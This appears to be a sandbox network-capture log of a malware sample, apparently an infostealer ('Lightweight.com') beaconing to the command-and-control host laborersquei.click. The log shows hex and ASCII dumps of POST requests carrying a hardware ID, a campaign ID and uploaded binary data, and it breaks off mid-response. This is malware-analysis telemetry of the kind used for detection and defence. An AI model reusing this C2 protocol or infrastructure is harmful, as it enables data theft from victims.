1	192.168.2.16	49709	172.67.166.49	443	2920	C:\Users\user\AppData\Local\Temp\709182\Lightweight.com

Timestamp	Bytes transferred	Direction	Data
2024-12-26 17:26:17 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 80 Host: laborersquei.click
2024-12-26 17:26:17 UTC	80	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 4d 77 31 49 45 2d 2d 70 73 79 63 68 65 26 6a 3d 61 61 37 37 65 37 38 62 36 62 30 64 64 31 62 32 32 32 36 65 37 62 37 39 39 35 33 32 61 62 33 61 Data Ascii: act=recive_message&ver=4.0&lid=jMw1IE--psyche&j=aa77e78b6b0dd1b2226e7b799532ab3a
2024-12-26 17:26:18 UTC	1139	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 17:26:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=k6c12ld6984c9mch813g3ml4bp; expires=Mon, 21 Apr 2025 11:12:57 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CLScZwkAZdfxUpLg0WpOOAu96Xq%2BnjetsQC653E8ARbbuHulZg3FCd2Y6LfdinMi68PP%2FQx16RFZnhtZgaEQ6bv%2B5tsF%2FJlVz6ZlX8wfG4AoCnU38xV%2FoCBI%2Flqtxx%2FDusR%2FA%2Fs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f82c669aba442a6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1861&min_rtt=1859&rtt_var=701&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=982&delivery_rate=1555673&cwnd=215&unsent_bytes=0&cid=ff5f1091b38e9f46&ts=787&x=0"
2024-12-26 17:26:18 UTC	230	IN	Data Raw: 34 65 61 30 0d 0a 78 39 6f 54 78 5a 63 33 32 42 2f 48 38 69 48 42 6e 43 73 51 74 41 76 72 47 69 47 4f 48 43 6b 63 35 63 48 71 46 6d 6b 59 42 47 4b 38 2b 47 58 6e 72 51 50 30 50 62 53 58 41 2f 76 36 53 6e 7a 48 62 73 63 34 51 4f 6f 2b 45 33 71 45 72 5a 6c 7a 52 54 70 79 44 2b 58 67 64 61 54 37 52 4c 30 7a 35 5a 64 5a 34 36 5a 77 61 35 5a 75 68 54 67 62 72 48 6c 44 66 6f 53 74 69 48 63 43 64 33 51 4f 70 4c 4a 2f 6f 76 39 53 75 33 75 6d 6e 6b 79 6b 2b 55 35 78 33 6d 57 43 64 30 6e 6a 50 67 55 2b 67 4c 76 49 4c 45 74 56 59 52 61 6d 6c 33 4b 32 2f 42 57 6c 4d 37 7a 51 52 4b 2b 2b 45 54 4c 56 62 6f 6c 32 52 2b 70 33 51 58 53 4e 70 59 6c 79 41 32 68 74 42 4b 2b 79 63 61 48 2b 57 4c 4a 76 Data Ascii: 4ea0x9oTxZc32B/H8iHBnCsQtAvrGiGOHCkc5cHqFmkYBGK8+GXnrQP0PbSXA/v6SnzHbsc4QOo+E3qErZlzRTpyD+XgdaT7RL0z5ZdZ46Zwa5ZuhTgbrHlDfoStiHcCd3QOpLJ/ov9Su3umnkyk+U5x3mWCd0njPgU+gLvILEtVYRaml3K2/BWlM7zQRK++ETLVbol2R+p3QXSNpYlyA2htBK+ycaH+WLJv
2024-12-26 17:26:18 UTC	1369	IN	Data Raw: 71 35 52 4c 72 2f 39 45 63 5a 59 6e 79 58 39 62 72 43 59 4c 4c 62 57 67 6d 57 55 65 64 33 59 47 35 61 63 2f 76 72 56 53 74 6a 33 39 30 45 75 76 38 45 78 78 32 57 36 49 65 46 48 6a 66 6b 68 32 6a 36 65 43 65 77 52 31 61 41 71 69 73 48 69 67 2b 6c 4b 79 65 36 71 54 41 2b 32 2b 54 6d 71 57 4d 63 6c 59 55 2b 39 39 58 33 4f 57 34 35 63 36 45 6a 70 68 44 4f 58 67 4d 61 48 37 56 4c 64 39 74 35 68 49 71 50 74 62 65 64 39 6b 68 48 68 4f 35 6e 46 49 66 6f 43 70 67 6e 73 42 66 6d 73 4e 6f 37 68 78 35 37 73 56 76 57 58 6c 79 41 4f 41 2b 31 6c 31 32 6e 2f 4c 51 67 50 7a 4d 46 49 2b 67 4b 2f 49 4c 45 74 79 59 77 4f 6d 73 33 36 6b 2f 56 36 6f 66 62 65 57 54 71 62 73 54 33 66 59 59 34 70 71 53 65 4a 34 53 48 65 4d 71 6f 31 7a 44 7a 6f 6f 51 4b 4b 67 4d 66 2b 31 64 4c 64 Data Ascii: q5RLr/9EcZYnyX9brCYLLbWgmWUed3YG5ac/vrVStj390Euv8Exx2W6IeFHjfkh2j6eCewR1aAqisHig+lKye6qTA+2+TmqWMclYU+99X3OW45c6EjphDOXgMaH7VLd9t5hIqPtbed9khHhO5nFIfoCpgnsBfmsNo7hx57sVvWXlyAOA+1l12n/LQgPzMFI+gK/ILEtyYwOms36k/V6ofbeWTqbsT3fYY4pqSeJ4SHeMqo1zDzooQKKgMf+1dLd
2024-12-26 17:26:18 UTC	1369	IN	Data Raw: 4b 66 2f 51 32 44 45 61 59 56 71 54 2b 5a 34 52 48 4f 4c 34 38 59 30 44 47 49 6d 57 4f 57 53 63 72 50 32 58 2f 68 49 70 70 35 4e 70 4f 67 4a 62 5a 68 77 79 58 39 50 72 43 59 4c 63 34 61 72 6a 6d 59 45 64 32 55 4f 71 37 64 30 71 50 31 56 75 6e 43 67 6c 45 69 6f 2f 55 52 32 78 47 4f 4a 63 45 62 74 64 45 45 2b 79 65 4f 50 62 45 73 69 4a 6a 47 79 73 7a 4f 53 39 6c 75 30 65 72 50 51 58 4f 33 6e 43 58 58 61 4b 64 45 34 54 75 52 37 54 6e 47 47 71 59 5a 78 41 58 5a 75 44 71 61 71 66 71 50 31 57 62 4a 33 71 4a 35 48 71 2f 64 43 65 64 42 70 69 48 49 44 6f 6a 35 4d 5a 73 66 37 79 45 41 4d 64 6d 73 50 35 34 31 79 71 66 74 53 72 44 32 36 33 6c 72 6a 2b 55 55 79 6a 69 6d 46 63 55 50 6e 64 45 39 2b 67 4b 36 4e 64 77 78 35 61 77 65 76 74 6e 61 6a 2b 56 79 33 65 36 57 58 Data Ascii: Kf/Q2DEaYVqT+Z4RHOL48Y0DGImWOWScrP2X/hIpp5NpOgJbZhwyX9PrCYLc4arjmYEd2UOq7d0qP1VunCglEio/UR2xGOJcEbtdEE+yeOPbEsiJjGyszOS9lu0erPQXO3nCXXaKdE4TuR7TnGGqYZxAXZuDqaqfqP1WbJ3qJ5Hq/dCedBpiHIDoj5MZsf7yEAMdmsP541yqftSrD263lrj+UUyjimFcUPndE9+gK6Ndwx5awevtnaj+Vy3e6WX
2024-12-26 17:26:18 UTC	1369	IN	Data Raw: 45 79 6a 69 6d 43 54 55 33 36 50 6c 51 77 6e 75 4f 50 65 45 73 69 4a 67 6d 73 71 6e 2b 70 2f 46 69 38 64 61 4b 65 54 71 6a 34 51 6e 58 52 62 34 52 77 54 75 6c 39 53 6e 71 4e 73 59 74 2f 41 58 64 73 51 4f 76 34 64 72 2b 31 44 66 70 61 71 62 6c 54 75 4f 78 66 4d 73 6b 6e 6b 44 68 45 34 44 34 54 50 6f 53 73 67 58 73 44 63 6d 6b 50 6f 62 5a 33 6f 66 68 51 74 58 65 33 6d 45 32 75 39 55 5a 35 78 47 6d 45 66 45 2f 6f 64 6b 42 30 78 2b 33 49 63 78 4d 36 50 6b 43 51 74 58 36 6e 39 6b 50 36 59 75 75 4a 41 36 54 79 43 53 71 57 5a 59 64 34 54 4f 42 79 51 48 61 47 72 34 5a 7a 44 6e 4e 75 43 4c 65 35 64 61 2f 30 57 37 56 38 6f 5a 56 47 70 2f 6c 4e 64 4e 6b 70 78 7a 68 45 39 44 34 54 50 71 69 45 76 54 59 71 51 43 59 66 36 36 45 78 6f 50 6b 56 34 6a 32 70 6b 30 2b 72 38 Data Ascii: EyjimCTU36PlQwnuOPeEsiJgmsqn+p/Fi8daKeTqj4QnXRb4RwTul9SnqNsYt/AXdsQOv4dr+1DfpaqblTuOxfMsknkDhE4D4TPoSsgXsDcmkPobZ3ofhQtXe3mE2u9UZ5xGmEfE/odkB0x+3IcxM6PkCQtX6n9kP6YuuJA6TyCSqWZYd4TOByQHaGr4ZzDnNuCLe5da/0W7V8oZVGp/lNdNkpxzhE9D4TPqiEvTYqQCYf66ExoPkV4j2pk0+r8
2024-12-26 17:26:18 UTC	1369	IN	Data Raw: 6c 79 53 41 44 35 6e 56 50 66 59 4f 6d 68 33 55 4b 66 48 51 48 72 4b 70 2f 71 76 70 64 73 6e 53 6b 6c 45 61 75 2b 45 56 34 31 32 36 48 64 6b 75 73 4d 41 74 35 6e 2b 50 51 4e 43 70 71 66 52 4b 7a 74 56 43 71 2b 68 57 6c 4d 37 7a 51 52 4b 2b 2b 45 54 4c 66 65 34 31 31 55 65 56 35 52 58 47 45 73 59 6c 35 41 47 68 68 44 36 47 2f 66 61 48 36 55 37 74 34 72 35 78 45 70 76 56 47 66 70 59 6e 79 58 39 62 72 43 59 4c 55 49 79 77 6e 33 63 46 63 58 41 62 35 61 63 2f 76 72 56 53 74 6a 33 39 30 45 43 6f 39 55 31 79 32 6d 6d 4e 64 55 50 2b 63 55 78 35 6a 71 69 61 66 67 78 39 62 51 69 75 74 33 65 31 2b 56 75 6f 65 4c 65 43 41 2b 32 2b 54 6d 71 57 4d 63 6c 4f 52 50 78 75 53 44 79 32 74 59 74 69 41 48 64 71 51 4c 72 32 61 4f 66 79 57 66 6f 6c 35 5a 5a 4d 71 76 31 47 63 39 Data Ascii: lySAD5nVPfYOmh3UKfHQHrKp/qvpdsnSklEau+EV4126HdkusMAt5n+PQNCpqfRKztVCq+hWlM7zQRK++ETLfe411UeV5RXGEsYl5AGhhD6G/faH6U7t4r5xEpvVGfpYnyX9brCYLUIywn3cFcXAb5ac/vrVStj390ECo9U1y2mmNdUP+cUx5jqiafgx9bQiut3e1+VuoeLeCA+2+TmqWMclORPxuSDy2tYtiAHdqQLr2aOfyWfol5ZZMqv1Gc9
2024-12-26 17:26:18 UTC	1369	IN	Data Raw: 57 36 77 6d 43 30 61 4d 72 62 70 33 45 44 70 35 54 72 7a 34 64 71 75 31 44 66 70 2b 6f 70 4e 43 71 66 64 46 66 64 46 74 6d 33 4a 45 2f 6e 39 4b 64 59 71 76 69 48 6b 47 63 47 63 4a 71 4c 52 38 6f 50 4a 61 76 7a 33 72 30 45 53 37 76 68 45 79 39 32 53 43 64 42 69 32 50 6c 51 77 6e 75 4f 50 65 45 73 69 4a 67 43 76 76 58 75 71 39 6c 71 35 62 36 53 57 55 61 50 7a 51 32 44 63 59 6f 78 31 54 75 46 39 54 58 69 4d 72 35 70 39 43 33 6c 74 51 4f 76 34 64 72 2b 31 44 66 70 65 73 6f 5a 4a 70 50 4a 66 65 64 64 71 6e 33 56 54 72 44 41 4c 62 34 43 79 79 43 77 64 61 6e 45 48 75 76 5a 6f 35 2f 4a 5a 2b 69 58 6c 6c 6b 71 6c 2b 55 39 38 78 47 79 50 64 30 7a 6c 64 30 39 32 68 4b 4f 4d 63 41 78 2f 5a 51 79 75 76 33 4b 6f 38 56 79 30 64 4b 72 51 44 65 50 35 55 54 4b 4f 4b 61 68 Data Ascii: W6wmC0aMrbp3EDp5Trz4dqu1Dfp+opNCqfdFfdFtm3JE/n9KdYqviHkGcGcJqLR8oPJavz3r0ES7vhEy92SCdBi2PlQwnuOPeEsiJgCvvXuq9lq5b6SWUaPzQ2DcYox1TuF9TXiMr5p9C3ltQOv4dr+1DfpesoZJpPJfeddqn3VTrDALb4CyyCwdanEHuvZo5/JZ+iXllkql+U98xGyPd0zld092hKOMcAx/ZQyuv3Ko8Vy0dKrQDeP5UTKOKah
2024-12-26 17:26:18 UTC	1369	IN	Data Raw: 45 5a 2f 6c 61 43 42 4e 45 55 36 59 52 6a 6c 34 44 47 48 2f 6b 4f 2f 65 72 50 53 64 71 44 77 52 33 58 41 4b 5a 5a 48 44 61 78 2f 43 79 61 2b 75 73 68 69 53 79 49 30 54 75 57 71 4d 66 2b 31 45 72 6c 76 74 35 5a 41 74 66 30 4f 54 4f 68 4f 6e 33 4a 45 2f 48 6c 63 63 63 66 74 79 48 74 4c 49 6c 39 41 72 4c 39 71 74 75 4e 59 71 6e 72 6c 72 77 33 6a 35 67 6b 71 6c 6c 79 4b 64 6b 33 72 61 46 6f 7a 6f 4c 57 43 63 78 74 39 63 51 2f 6c 39 6a 47 68 74 51 33 70 4d 2b 57 55 55 75 4f 6d 47 53 43 4e 50 4e 6f 76 45 37 35 68 42 57 66 48 74 63 67 73 57 54 51 6d 45 75 58 67 4d 65 44 32 52 36 68 37 70 6f 5a 41 35 4d 42 33 56 63 78 6b 6a 32 39 53 30 6b 42 4d 5a 49 71 6c 6e 32 56 48 62 32 55 4f 71 37 39 6e 35 37 73 56 74 54 33 39 71 51 50 72 76 6e 59 38 6c 6e 48 4a 49 41 50 5a Data Ascii: EZ/laCBNEU6YRjl4DGH/kO/erPSdqDwR3XAKZZHDax/Cya+ushiSyI0TuWqMf+1Erlvt5ZAtf0OTOhOn3JE/HlcccftyHtLIl9ArL9qtuNYqnrlrw3j5gkqllyKdk3raFozoLWCcxt9cQ/l9jGhtQ3pM+WUUuOmGSCNPNovE75hBWfHtcgsWTQmEuXgMeD2R6h7poZA5MB3Vcxkj29S0kBMZIqln2VHb2UOq79n57sVtT39qQPrvnY8lnHJIAPZ
2024-12-26 17:26:18 UTC	1369	IN	Data Raw: 6a 74 6b 54 51 64 4f 6a 35 53 36 2f 68 6a 35 36 30 56 2f 58 36 33 67 6b 57 67 36 45 6f 31 36 46 65 75 64 6b 54 74 61 46 74 70 69 4a 32 32 59 51 68 30 61 41 65 7a 71 54 48 70 74 56 72 36 4a 5a 7a 51 43 2b 50 42 42 7a 4c 4f 4b 64 45 34 64 75 39 77 52 58 6d 52 73 73 56 54 42 58 31 6e 46 72 57 76 66 75 65 37 46 62 77 39 2f 63 49 4e 34 2f 70 59 4d 6f 34 35 32 79 4d 57 76 79 6b 62 4c 4a 6a 74 6b 54 51 64 4f 6a 35 53 36 2f 68 6a 35 36 30 56 2f 58 36 33 67 6b 57 67 36 45 6f 31 36 46 65 75 64 6b 54 74 61 46 74 70 69 4f 79 6d 51 69 70 45 57 42 57 6d 74 6e 2b 67 34 30 54 36 4d 2b 57 66 41 2f 76 48 43 54 71 57 56 73 63 34 57 36 77 6d 43 30 75 45 72 59 5a 7a 48 57 73 72 4a 36 75 2f 63 4c 48 6c 51 72 55 79 69 36 5a 69 34 37 41 4a 64 4a 59 78 32 7a 59 44 36 47 38 4c 4a Data Ascii: jtkTQdOj5S6/hj560V/X63gkWg6Eo16FeudkTtaFtpiJ22YQh0aAezqTHptVr6JZzQC+PBBzLOKdE4du9wRXmRssVTBX1nFrWvfue7Fbw9/cIN4/pYMo452yMWvykbLJjtkTQdOj5S6/hj560V/X63gkWg6Eo16FeudkTtaFtpiOymQipEWBWmtn+g40T6M+WfA/vHCTqWVsc4W6wmC0uErYZzHWsrJ6u/cLHlQrUyi6Zi47AJdJYx2zYD6G8LJ
2024-12-26 17:26:18 UTC	1369	IN	Data Raw: 46 48 58 6c 6d 44 71 4c 34 50 2b 66 74 46 65 49 39 69 49 4a 45 73 2f 30 4a 50 4a 5a 6c 79 53 41 44 34 57 78 4d 62 6f 54 76 6a 32 34 4d 4f 6e 6c 4f 76 50 68 6e 35 36 30 47 39 44 32 33 30 42 76 6a 75 55 64 2f 31 32 71 48 65 31 48 2b 65 45 68 6f 68 4f 53 32 53 69 5a 6f 59 52 43 6d 2b 6b 43 71 38 55 4f 76 66 72 57 58 66 5a 33 54 57 33 58 47 61 73 74 55 52 4f 46 79 64 55 43 77 73 6f 39 6b 53 56 78 6c 46 71 62 34 50 2b 66 74 46 65 49 39 69 49 4a 45 73 2f 30 4c 58 74 46 6b 68 54 68 63 6f 6d 63 4c 61 4d 66 37 32 7a 70 4c 61 43 5a 59 35 66 39 79 74 65 64 54 75 57 75 6d 31 33 32 64 30 31 74 31 78 6d 72 4c 53 55 37 6f 61 46 35 39 6c 36 53 32 53 69 5a 6f 59 52 43 6d 2b 6c 53 64 74 32 53 73 66 71 57 65 52 4f 4f 77 43 57 71 57 4d 63 6c 56 55 65 74 75 53 44 79 69 6d 63 Data Ascii: FHXlmDqL4P+ftFeI9iIJEs/0JPJZlySAD4WxMboTvj24MOnlOvPhn560G9D230BvjuUd/12qHe1H+eEhohOS2SiZoYRCm+kCq8UOvfrWXfZ3TW3XGastUROFydUCwso9kSVxlFqb4P+ftFeI9iIJEs/0LXtFkhThcomcLaMf72zpLaCZY5f9ytedTuWum132d01t1xmrLSU7oaF59l6S2SiZoYRCm+lSdt2SsfqWeROOwCWqWMclVUetuSDyimc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.16	49710	172.67.166.49	443	2920	C:\Users\user\AppData\Local\Temp\709182\Lightweight.com

Timestamp	Bytes transferred	Direction	Data
2024-12-26 17:26:20 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=OP2N2ST4JG5L User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12809 Host: laborersquei.click
2024-12-26 17:26:20 UTC	12809	OUT	Data Raw: 2d 2d 4f 50 32 4e 32 53 54 34 4a 47 35 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 37 35 42 43 34 30 43 38 37 44 30 35 42 37 44 30 46 32 33 42 45 33 42 46 41 34 44 37 42 30 0d 0a 2d 2d 4f 50 32 4e 32 53 54 34 4a 47 35 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 50 32 4e 32 53 54 34 4a 47 35 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 70 73 79 63 68 65 0d 0a 2d 2d 4f 50 32 4e 32 53 54 34 4a 47 35 4c 0d Data Ascii: --OP2N2ST4JG5LContent-Disposition: form-data; name="hwid"F175BC40C87D05B7D0F23BE3BFA4D7B0--OP2N2ST4JG5LContent-Disposition: form-data; name="pid"2--OP2N2ST4JG5LContent-Disposition: form-data; name="lid"jMw1IE--psyche--OP2N2ST4JG5L
2024-12-26 17:26:21 UTC	1133	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 17:26:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=kojser6oi7hngfmhjqcdp29dad; expires=Mon, 21 Apr 2025 11:12:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZKZnsyPLa4qXShwpx7QTkDofRKks10iGmmR%2B9WkzV4ymUTqTrkTPYzGWCqQhaMAJcU2BBKzNuicjxhUUGcfgoYU7%2FyHVTd%2FWC3RlfA5suD33jbgzZCmroaY9q2YuV0%2F7oU3H4sU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f82c6792ef343b5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2059&min_rtt=2048&rtt_var=791&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2845&recv_bytes=13745&delivery_rate=1363848&cwnd=225&unsent_bytes=0&cid=cca0963989c69146&ts=948&x=0"
2024-12-26 17:26:21 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-26 17:26:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.16	49711	172.67.166.49	443	2920	C:\Users\user\AppData\Local\Temp\709182\Lightweight.com

Timestamp	Bytes transferred	Direction	Data
2024-12-26 17:26:22 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=PW26DGQR6PK3HXL User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15062 Host: laborersquei.click
2024-12-26 17:26:22 UTC	15062	OUT	Data Raw: 2d 2d 50 57 32 36 44 47 51 52 36 50 4b 33 48 58 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 37 35 42 43 34 30 43 38 37 44 30 35 42 37 44 30 46 32 33 42 45 33 42 46 41 34 44 37 42 30 0d 0a 2d 2d 50 57 32 36 44 47 51 52 36 50 4b 33 48 58 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 57 32 36 44 47 51 52 36 50 4b 33 48 58 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 70 73 79 63 68 65 0d 0a 2d 2d 50 57 32 36 Data Ascii: --PW26DGQR6PK3HXLContent-Disposition: form-data; name="hwid"F175BC40C87D05B7D0F23BE3BFA4D7B0--PW26DGQR6PK3HXLContent-Disposition: form-data; name="pid"2--PW26DGQR6PK3HXLContent-Disposition: form-data; name="lid"jMw1IE--psyche--PW26
2024-12-26 17:26:23 UTC	1133	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 17:26:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bqvm1kdpurdr6mp2mkdthnse83; expires=Mon, 21 Apr 2025 11:13:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uFgjM1%2FoP4KRI7U1n6oHls2UOoZLNBJF74Mj%2Fu4TT8X3repDsujik6FMElC%2BEJ6PeyYYLRPU9yVwo70XqwDsJAB7pDmnMb87847bCDgo15h1eSTkb1%2B9QJlNEjj2dDFJ8tdhP0w%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f82c6887fe17281-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1815&min_rtt=1813&rtt_var=684&sent=11&recv=21&lost=0&retrans=0&sent_bytes=2846&recv_bytes=16001&delivery_rate=1596500&cwnd=214&unsent_bytes=0&cid=90acea29bae790ea&ts=919&x=0"
2024-12-26 17:26:23 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-26 17:26:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.16	49712	172.67.166.49	443	2920	C:\Users\user\AppData\Local\Temp\709182\Lightweight.com

Timestamp	Bytes transferred	Direction	Data
2024-12-26 17:26:25 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=J00HHUFWER406WDENMR User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20429 Host: laborersquei.click
2024-12-26 17:26:25 UTC	15331	OUT	Data Raw: 2d 2d 4a 30 30 48 48 55 46 57 45 52 34 30 36 57 44 45 4e 4d 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 37 35 42 43 34 30 43 38 37 44 30 35 42 37 44 30 46 32 33 42 45 33 42 46 41 34 44 37 42 30 0d 0a 2d 2d 4a 30 30 48 48 55 46 57 45 52 34 30 36 57 44 45 4e 4d 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4a 30 30 48 48 55 46 57 45 52 34 30 36 57 44 45 4e 4d 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 70 73 Data Ascii: --J00HHUFWER406WDENMRContent-Disposition: form-data; name="hwid"F175BC40C87D05B7D0F23BE3BFA4D7B0--J00HHUFWER406WDENMRContent-Disposition: form-data; name="pid"3--J00HHUFWER406WDENMRContent-Disposition: form-data; name="lid"jMw1IE--ps
2024-12-26 17:26:25 UTC	5098	OUT	Data Raw: 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 60 14 2c 6c fa 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: (X&7~`aO`,li`M?lrQMn 64
2024-12-26 17:26:26 UTC	1127	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 17:26:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=obnjvp1050rtu33d5m73khj21g; expires=Mon, 21 Apr 2025 11:13:04 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PdIhAQCP7fZz%2FoPb9mQhrO9u09Ez12ypV22uSnu2arkaKI8MeVBtwCUuarTTqZ9yS17ZBdjM7QXOVsn7ZF6YLQMNQEfXyHt3azQfEfuHZbKOHnGzFEBV5iNKE1ZcybiJjqBOrsk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f82c697ff777292-EWR alt-svc: h3=":443"; ma=86400 server-timing: 